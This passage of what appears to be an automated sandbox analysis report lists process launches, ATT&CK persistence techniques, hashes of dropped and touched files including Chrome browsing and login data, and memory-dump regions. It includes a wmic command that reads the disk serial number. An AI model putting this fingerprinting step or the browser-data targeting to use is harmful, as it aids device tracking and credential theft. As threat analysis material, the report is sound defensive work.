  "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\DataReporting.exe" WondershareFilmora

C:\Windows\System32\Wbem\wmic.exe  (tree level 3)
  wmic diskdrive where index=1 get serialnumber

C:\Windows\system32\AUDIODG.EXE  (tree level 1)
  C:\Windows\system32\AUDIODG.EXE 0x414

C:\PROGRA~2\COMMON~1\WONDER~1\WONDER~1\WSHelper.exe  (tree level 1)
  C:\PROGRA~2\COMMON~1\WONDER~1\WONDER~1\WSHelper.exe -Embedding
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Change Default File Association (1)
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (2)
- Bootkit (1)
- Scheduled Task (1)
Downloads
-
C:\Program Files\WinRAR\Rar.txt
Filesize 109KB
MD5 e8943094a7a6e3a6767e8d412fdbc8c3
SHA1 7e7eac16f0741a747639a131cf8e93e63c7e9d7c
SHA256 35c7deb1cf472f4d695ab0def305234629440236a8e9422fa8860c362ffe35bd
SHA512 dda86c6f7ad30bf7dfb7d2d8584f0956018b7425837129d6c9de3c126a9ec48bda8b761bd6084031f0daaa22393af901820a9f2cce1a049944db27705da1209b
-
C:\Program Files\WinRAR\Uninstall.exe
Filesize 437KB
MD5 4b666387a3c9dcff1a35f928003906f8
SHA1 afdcb15eb059fa09acc0f0ac7745a5c9b6325cf6
SHA256 882dc7d4df95d06de571b475f50472639d62298b7da2bb78cd35f462d815fe92
SHA512 60c26cea6eff640b116e98f8e8a6d6de00e6fe6cc379768574c5a8e1df95a6cf6bf37e2f56d040cca537a3406e2af05888a63c5b167ca25b16518808c3a5574e
-
C:\Program Files\WinRAR\WhatsNew.txt
Filesize 102KB
MD5 009a59803c14130cfb6ef5b1fc8b2bce
SHA1 1842d01ecd0bfaf5db6c89d17458ba9cac8d0cf1
SHA256 86491ffa4415b525dd4f51f3806b5217c5fdbaeee83ac313e28ed342bde83ff5
SHA512 a67aa1d6ccfce38314d488fa20469b05f84cf5cb5bdd089b7c28349b64bc359954fccfea7eb574eb3eeb7eec4b6d7f07f334c6be96d14ea301b7706d168ed3d3
-
C:\Program Files\WinRAR\WinRAR.chm
Filesize 317KB
MD5 79f52d2a3c76f7402de3e30b2dc9bc7e
SHA1 bb15a3289e308295891b3078190e8d797a52acf2
SHA256 4e4db98a555a3821e911bc35c301fd4dab8530cf9fede6f6c9439e212919abda
SHA512 73b09d5db6ca8587ec8f5b7a0bd711a9225561116d90ae7609442bd388110eebb075a5862bb1abae54f8c32cb880e27d741dbecdba2cb9b2c10c5ef7b1a2685b
-
C:\Program Files\WinRAR\WinRAR.exe
Filesize 2.4MB
MD5 f01b85893ccecbb9020d065e47e046aa
SHA1 237311f4c143f74758a8ef6aeeeff0b9dcfe1434
SHA256 821588b7db1e9a4ddcf4a53435334370e57cd4663a6f4f2aa570e5850432ca42
SHA512 5f821880075570b6f1fa5bdf231d46b4e64dd44e2b122cd7c6ef6ed007e9bf23e33e1abef6eef1ef3a9eb63940bc8eb63cc0daa5a2e85062dbb4f2292d59c835
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
Filesize 40B
MD5 7813407c23c86944dcb6198cd05110c1
SHA1 5cd0ce8b526f820df7110425432ac5d4ef674051
SHA256 c3cae4b8b257fa124145a9d1f97c64716eba9eb7916bb46e788e606324613306
SHA512 6055e7cc9f8249da378339221565e5c6779a7330a82e61e001b3b4ef6f9381eda43ad478ca61fbd7be9392a8d24a55bd83c961a4c8d9a1cc6b1094706e905acd
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Favicons
Filesize 24KB
MD5 f9ada17ad0c764caab65380c502cde2f
SHA1 d34148b6975396a933bf25ac432ca1f5c0657545
SHA256 3f298af4d4d1d82e998d277a8672cdc64f98d8a58ec985796777c4be5abce032
SHA512 b73e1881318d5a59ee9c0a8427dcc34e34c473e83e37b491ed9dd443c69df8beb3f24af7cac8150973a7d6af3bbba604560c87d351eb2943df8199a55483bb8c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
Filesize 116KB
MD5 7f3de7442dc7635c26ff3f20404a3e7e
SHA1 d80483a21d30f84cb3feaec60136178b5dd9747d
SHA256 a0c6c55e92fb13e320da64b944b4e5bc30f0062d5ff6e5bdd3918b82663c9328
SHA512 e6e76728a518cfb29b4ef33700777f7aa304670355fd4798be6fecc246497fd783bdccc338cbc42bf2bfd744d4214fb2d9ee8d4495f8413abbdf44e86f194ed5
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize 5KB
MD5 6a864cf4c6317375ffec46144f9939eb
SHA1 659acde2142d9c9e65e3b56b4b0d0cf3d5578f80
SHA256 f7c7870f444ab048c191e42a940799ce316d13b9c892270bdd249fae8ad110ee
SHA512 fd7b5364c2d6d3a38340bcf3f88a3c9cf9f5f9e6dfb214a220e0ca87bb3fc8a2d393eb12360d0c8169b437cc093bcc112e96987b49365b93b71f548ab605e4bc
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize 17KB
MD5 cf5b59cf8230f4ec3c8d3c8803b0ad44
SHA1 ba6b4709b0c29814bb3c319559e5fecd8ad68a5c
SHA256 5f5b50478e0b5b024899c2c91ffb438597d5c46794569f6b8bd32cb1b9cc0e6a
SHA512 935ea0a0d40a08db11ad7ac5004624653983134efa94f09dc33092b2e5796b01a35b4acae386234c8ec2d31e59f736960f49b5d0cda2bc63bc9e5d11d1194d48
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log
Filesize 112B
MD5 d12e266700c631cee7f32ca308ef7113
SHA1 82537f964f4fd457290220aa9da0c3653ffa7475
SHA256 838ac83d922c4b2cff2c83ea403257ee34532fcfd7e1a9f3e001bbfe195b1575
SHA512 58660e602599e2ea956a3ec9e8a31ff9f00f9eb498336414f8aff15bfcc2e82b7f1e1dcf0dfce8f232808dc25bb10e67289a9a04b4180cbae3e513afbbf26424
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
Filesize 345B
MD5 41cf172de2d19a0c210e118d3e18ac69
SHA1 e12ab34dcd2f83a5e4e4558ad539c8901a3d63ac
SHA256 4175cec4ac7991cbd39e486e388c6915e604d5caa0d48f1625d2e77e30261a0b
SHA512 2683e64f45031b6e25bd30c05db452beeab8da935345af00c6a47394bd5d36c06f5bbf75bc8a9014ddd24ba331310e02dcfbed153ca607b3674af22bbf34e90d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
Filesize 160B
MD5 de92ad90be6d3364745b2f73f4c3cf73
SHA1 9158681463bd30e5af4dda4baac81f93cedbda77
SHA256 0025a3e0d3b834401b3b5f820e1991ef7e810d9a4b8b6b579e6301c94e7031a0
SHA512 9e81cefc195439439f4b23ee7696309d7bc3c08e5b444d2abde26d2f12b2d3bcfd124fb9a2d40c6389e9f787741676fad366a2e9982674e7b931028c014d8a79
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
Filesize 321B
MD5 21f393c243982e283501e0adde952f71
SHA1 b97d8e20c8269537bc10f729e0d43e362cf0600e
SHA256 3d1647df082909c4427432e1558da0736ac1eeb93201fb3397cefd29d3956ad4
SHA512 70d803d73ba35212445913610ab1b969e7e9a6a4c9cb64c9eddd72a40874746a78e0701e6d8c20afd45b9eaf82b01cab41af24a4c3c6d6e35e3c8e79cb9dbacf
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Visited Links
Filesize 128KB
MD5 1623544b8bd4900f7201d2af254660c3
SHA1 f082c5ec4b6e99fd6164c5a5bc49c2b925868527
SHA256 27e1d31b2914dfba863554cfbe9e56b8bea39d758b64dc3065206857fcabd8fb
SHA512 a151e79d70cea8c0b748ee3ff12e20710e50c02da0864019815facb09eec7c075af175f53fa47265c11f871ce22260bdf2a4fb840be28f4c14f144706c29e457
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data
Filesize 88KB
MD5 ba6e4372ba9058d120904c1fa84e8090
SHA1 a7396a651181c5d95fe963e912cda7484b4ad725
SHA256 a37dcde41c94bc0f9a914ea2ac2e14bb9345a09e229b19b684763e8f48c0f227
SHA512 dfd24afab34d88d65f7bbb6db9de2e668479aefe700b5707dcdaf395703927a61cdf58c50a15bc529263eba1e288d4bc61483348cd15b12247a8859092b277fb
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
Filesize 13B
MD5 b63048c4e7e52c52053d25da30d9c5ab
SHA1 679a44d402f5ec24605719e06459f5a707989187
SHA256 389caa40ea458e84bc624a9af1e0dec60fa652b2db2b81c09b1dfe22822cc3d1
SHA512 e86c58c5a25e24f21ad79ed526a90c120a09c115f4820663bd2ebbc59e7bb1c4c418267eb77645522aa20b2c1b53fba8e31690db7bae9b21e4eff3db06316359
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize 109KB
MD5 cefa4d5cb6bda2e42571d100bc223f95
SHA1 7d0317842982917fe5388261dfb6441699e62795
SHA256 d7c62cffeda71c580b6269816ff5db3daf00b51cc981ecc2232ecb60e4028009
SHA512 1247c85c88f4da94ff787ccb4e2abe5ae07750c02eeceb99dfeb0edbe1b441e8f1733db39697334389ef4ff59241550a35ce0f5bf97bbf118ddd1fdc686abfbb
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
Filesize 264KB
MD5 42c89fa476f3f4fcb013030f31ea3d73
SHA1 d0843ce4c1ff7c1b3a46b571ccdffa417227d8ea
SHA256 c9f37ceb1ed7abdb0ccf1847487bffc932dbe91a5430ecd038ec57fa4b93593a
SHA512 a8d7490f399bf977a009a482a4ccd50df6b4c1c9d1dc19ebcc9a6d7e1f20094af5f94208052f3ec1c84850123988d8c5eef98149f31b89b9f2a0f2c41dff1940
-
C:\Users\Admin\Downloads\winrar-x64-620.exe
Filesize 3.4MB
MD5 73414a9b8498d43b9a195dac57871203
SHA1 3e59209a7855955c7ca7500adf43e9c17b9a4568
SHA256 4b153e952d823b2126d3efba4f8a1353642645e00be93ab49f603d9e924c800e
SHA512 cb7dbfef452ff3da6207afea59ba77f0790756ea87a690d08cad32f27feaa78aa47196eeb9e7ae78ac3690bdf2195fca06a5b96c4614ca350803d70e743e5017
-
\??\pipe\crashpad_2200_BEEQDDESNABFMUQN
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\crashpad_4248_AROZRFYHQICDCLRK
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/216-998-0x0000000000000000-mapping.dmp
-
memory/236-470-0x0000000000000000-mapping.dmp
-
memory/424-878-0x0000000000000000-mapping.dmp
-
memory/496-1036-0x0000000000000000-mapping.dmp
-
memory/580-4009-0x0000000000400000-0x0000000000414000-memory.dmp
Filesize 80KB
-
memory/580-3932-0x0000000000400000-0x0000000000414000-memory.dmp
Filesize 80KB
-
memory/708-987-0x0000000000000000-mapping.dmp
-
memory/764-379-0x0000000000560000-0x0000000000586000-memory.dmp
Filesize 152KB
-
memory/764-304-0x0000000000581C5E-mapping.dmp
-
memory/764-387-0x000000000AF60000-0x000000000AFF2000-memory.dmp
Filesize 584KB
-
memory/764-418-0x000000000AF10000-0x000000000AF1A000-memory.dmp
Filesize 40KB
-
memory/764-421-0x000000000B1E0000-0x000000000B246000-memory.dmp
Filesize 408KB
-
memory/828-811-0x0000000000000000-mapping.dmp
-
memory/916-1920-0x0000000000000000-mapping.dmp
-
memory/1016-960-0x0000000000000000-mapping.dmp
-
memory/1180-1027-0x0000000000000000-mapping.dmp
-
memory/1284-999-0x0000000000000000-mapping.dmp
-
memory/1528-266-0x0000000000000000-mapping.dmp
-
memory/1528-307-0x00000000001A0000-0x00000000003CA000-memory.dmp
Filesize 2.2MB
-
memory/1540-837-0x0000000000000000-mapping.dmp
-
memory/1560-4377-0x0000022119068000-0x00000221190A8000-memory.dmp
Filesize 256KB
-
memory/1560-4379-0x000002211579F000-0x00000221157EF000-memory.dmp
Filesize 320KB
-
memory/1560-4389-0x0000022116009000-0x0000022116049000-memory.dmp
Filesize 256KB
-
memory/1560-4369-0x0000022113CF5000-0x0000022113D35000-memory.dmp
Filesize 256KB
-
memory/1560-4388-0x0000022115FC8000-0x0000022116008000-memory.dmp
Filesize 256KB
-
memory/1560-4370-0x0000022114CA5000-0x0000022114CE5000-memory.dmp
Filesize 256KB
-
memory/1560-4378-0x00000221155E4000-0x0000022115624000-memory.dmp
Filesize 256KB
-
memory/1560-4380-0x0000022115668000-0x00000221156A8000-memory.dmp
Filesize 256KB
-
memory/1560-4371-0x0000022114CE7000-0x0000022114D27000-memory.dmp
Filesize 256KB
-
memory/1560-4372-0x0000022114D29000-0x0000022114D69000-memory.dmp
Filesize 256KB
-
memory/1560-4382-0x00000221157F4000-0x0000022115834000-memory.dmp
Filesize 256KB
-
memory/1560-4386-0x0000022115F3E000-0x0000022115F7E000-memory.dmp
Filesize 256KB
-
memory/1560-4376-0x00000221155A1000-0x00000221155E1000-memory.dmp
Filesize 256KB
-
memory/1560-4387-0x0000022115F87000-0x0000022115FC7000-memory.dmp
Filesize 256KB
-
memory/1560-4385-0x0000022115EFD000-0x0000022115F3D000-memory.dmp
Filesize 256KB
-
memory/1560-4384-0x0000022115BBA000-0x0000022115BFA000-memory.dmp
Filesize 256KB
-
memory/1560-4383-0x0000022115ADD000-0x0000022115B1D000-memory.dmp
Filesize 256KB
-
memory/1560-4381-0x00000221157B2000-0x00000221157F2000-memory.dmp
Filesize 256KB
-
memory/1560-4373-0x0000022114D6D000-0x0000022114DAD000-memory.dmp
Filesize 256KB
-
memory/1560-4374-0x0000022114DB0000-0x0000022114DF0000-memory.dmp
Filesize 256KB
-
memory/1560-4375-0x0000022117BC0000-0x0000022117C00000-memory.dmp
Filesize 256KB
-
memory/1808-2294-0x0000000000000000-mapping.dmp
-
memory/1900-988-0x0000000000000000-mapping.dmp
-
memory/1988-1044-0x0000000000000000-mapping.dmp
-
memory/2020-310-0x0000000000000000-mapping.dmp
-
memory/2020-378-0x0000000000F50000-0x0000000000F64000-memory.dmp
Filesize 80KB
-
memory/2020-385-0x0000000005DB0000-0x00000000062AE000-memory.dmp
Filesize 5.0MB
-
memory/2116-1544-0x0000000000000000-mapping.dmp
-
memory/2220-1331-0x0000000000000000-mapping.dmp
-
memory/2396-853-0x0000000000000000-mapping.dmp
-
memory/2464-1024-0x0000000000000000-mapping.dmp
-
memory/2532-1032-0x0000000000000000-mapping.dmp
-
memory/2536-157-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-201-0x0000000000400000-0x0000000000E67000-memory.dmp
Filesize 10.4MB
-
memory/2536-200-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-199-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-198-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-197-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-196-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-195-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-194-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-193-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-192-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-191-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-190-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-189-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-188-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-187-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-186-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-185-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-184-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-183-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-182-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-181-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-180-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-179-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-178-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-177-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-176-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-175-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-174-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-172-0x0000000000400000-0x0000000000E67000-memory.dmp
Filesize 10.4MB
-
memory/2536-171-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-170-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-168-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-3808-0x0000000000400000-0x0000000000E67000-memory.dmp
Filesize 10.4MB
-
memory/2536-169-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-167-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-166-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-165-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-164-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-163-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-162-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-161-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-160-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-159-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-158-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-156-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-155-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-154-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-153-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-152-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2536-151-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/2732-523-0x0000000007990000-0x0000000007FB8000-memory.dmp
Filesize 6.2MB
-
memory/2732-592-0x0000000009BA0000-0x0000000009BBE000-memory.dmp
Filesize 120KB
-
memory/2732-568-0x0000000008810000-0x000000000885B000-memory.dmp
Filesize 300KB
-
memory/2732-578-0x0000000008B10000-0x0000000008B86000-memory.dmp
Filesize 472KB
-
memory/2732-518-0x0000000007320000-0x0000000007356000-memory.dmp
Filesize 216KB
-
memory/2732-1284-0x0000000009DB0000-0x0000000009DB8000-memory.dmp
Filesize 32KB
-
memory/2732-1210-0x0000000009DD0000-0x0000000009DEA000-memory.dmp
Filesize 104KB
-
memory/2732-591-0x0000000009B60000-0x0000000009B93000-memory.dmp
Filesize 204KB
-
memory/2732-550-0x0000000007900000-0x0000000007922000-memory.dmp
Filesize 136KB
-
memory/2732-601-0x0000000009BC0000-0x0000000009C65000-memory.dmp
Filesize 660KB
-
memory/2732-605-0x0000000009EB0000-0x0000000009F44000-memory.dmp
Filesize 592KB
-
memory/2732-566-0x00000000082E0000-0x00000000082FC000-memory.dmp
Filesize 112KB
-
memory/2732-480-0x0000000000000000-mapping.dmp
-
memory/2732-560-0x00000000083C0000-0x0000000008710000-memory.dmp
Filesize 3.3MB
-
memory/2732-558-0x0000000008350000-0x00000000083B6000-memory.dmp
Filesize 408KB
-
memory/3028-1016-0x0000000000000000-mapping.dmp
-
memory/3044-116-0x0000000000000000-mapping.dmp
-
memory/3128-823-0x0000000000000000-mapping.dmp
-
memory/3204-1645-0x0000000000000000-mapping.dmp
-
memory/3264-3834-0x0000000000400000-0x0000000000E83000-memory.dmp
Filesize 10.5MB
-
memory/3264-3833-0x0000000000400000-0x0000000000E83000-memory.dmp
Filesize 10.5MB
-
memory/3420-845-0x0000000000000000-mapping.dmp
-
memory/3620-4173-0x0000000000400000-0x00000000004F2000-memory.dmp
Filesize 968KB
-
memory/3620-4194-0x0000000000400000-0x00000000004F2000-memory.dmp
Filesize 968KB
-
memory/3656-1000-0x0000000000000000-mapping.dmp
-
memory/3680-808-0x0000000000000000-mapping.dmp
-
memory/3680-982-0x0000000000360000-0x0000000000376000-memory.dmp
Filesize 88KB
-
memory/3736-148-0x0000000000000000-mapping.dmp
-
memory/3820-1738-0x0000000000000000-mapping.dmp
-
memory/3844-215-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/3844-209-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/3844-203-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/3844-204-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/3844-214-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/3844-205-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/3844-206-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/3844-207-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/3844-208-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/3844-238-0x0000000000400000-0x0000000000E67000-memory.dmp
Filesize 10.4MB
-
memory/3844-202-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/3844-210-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/3844-211-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/3844-212-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/3844-213-0x00000000774C0000-0x000000007764E000-memory.dmp
Filesize 1.6MB
-
memory/3880-885-0x0000000000000000-mapping.dmp
-
memory/3924-2384-0x0000000000000000-mapping.dmp
-
memory/3992-869-0x0000000000000000-mapping.dmp
-
memory/4232-1009-0x0000000000000000-mapping.dmp
-
memory/4432-2040-0x0000000000000000-mapping.dmp
-
memory/4444-861-0x0000000000000000-mapping.dmp
-
memory/4456-125-0x0000000000000000-mapping.dmp
-
memory/4468-659-0x0000000000000000-mapping.dmp
-
memory/4468-894-0x0000000000000000-mapping.dmp
-
memory/4476-2429-0x0000000000000000-mapping.dmp
-
memory/4548-3756-0x000001897EB20000-0x000001897EB42000-memory.dmp
Filesize 136KB
-
memory/4548-3759-0x000001897ECD0000-0x000001897ED46000-memory.dmp
Filesize 472KB
-
memory/4556-1732-0x0000000000000000-mapping.dmp
-
memory/4644-1584-0x0000000000000000-mapping.dmp
-
memory/4664-2122-0x0000000000000000-mapping.dmp
-
memory/4684-1745-0x0000000000000000-mapping.dmp
-
memory/4728-419-0x0000000000000000-mapping.dmp
-
memory/4728-667-0x0000000000400000-0x0000000000E49000-memory.dmp
Filesize 10.3MB
-
memory/4728-606-0x0000000000400000-0x0000000000E49000-memory.dmp
Filesize 10.3MB
-
memory/4728-467-0x0000000000400000-0x0000000000E49000-memory.dmp
Filesize 10.3MB
-
memory/4764-829-0x0000000000000000-mapping.dmp
-
memory/4816-2011-0x0000000000400000-0x0000000000471000-memory.dmp
Filesize 452KB
-
memory/4816-2686-0x0000000000400000-0x0000000000471000-memory.dmp
Filesize 452KB
-
memory/4816-1941-0x0000000000000000-mapping.dmp
-
memory/4816-4275-0x0000000000400000-0x0000000000471000-memory.dmp
Filesize 452KB
-
memory/4868-1878-0x0000000000400000-0x0000000000E49000-memory.dmp
Filesize 10.3MB
-
memory/4868-1903-0x0000000000400000-0x0000000000E49000-memory.dmp
Filesize 10.3MB
-
memory/4900-1003-0x0000000000000000-mapping.dmp
-
memory/4972-1455-0x0000000000000000-mapping.dmp
-
memory/5048-818-0x0000000000000000-mapping.dmp
-
memory/5048-2081-0x0000000000000000-mapping.dmp
-
memory/5072-905-0x0000000000000000-mapping.dmp
-
memory/5108-814-0x0000000000000000-mapping.dmp
-
memory/5136-2339-0x0000000000000000-mapping.dmp
-
memory/5228-1874-0x0000000000000000-mapping.dmp
-
memory/5420-1906-0x0000000000000000-mapping.dmp
-
memory/5432-4368-0x0000033238850000-0x0000033238860000-memory.dmp
Filesize 64KB
-
memory/5432-4356-0x00007FF9D0D20000-0x00007FF9D0EFB000-memory.dmp
Filesize 1.9MB
-
memory/5516-2249-0x0000000000000000-mapping.dmp
-
memory/5568-2204-0x0000000000000000-mapping.dmp
-
memory/5676-2163-0x0000000000000000-mapping.dmp
-
memory/5708-1926-0x0000000000000000-mapping.dmp
-
memory/5736-1912-0x0000000000000000-mapping.dmp
-
memory/5912-1981-0x0000000000000000-mapping.dmp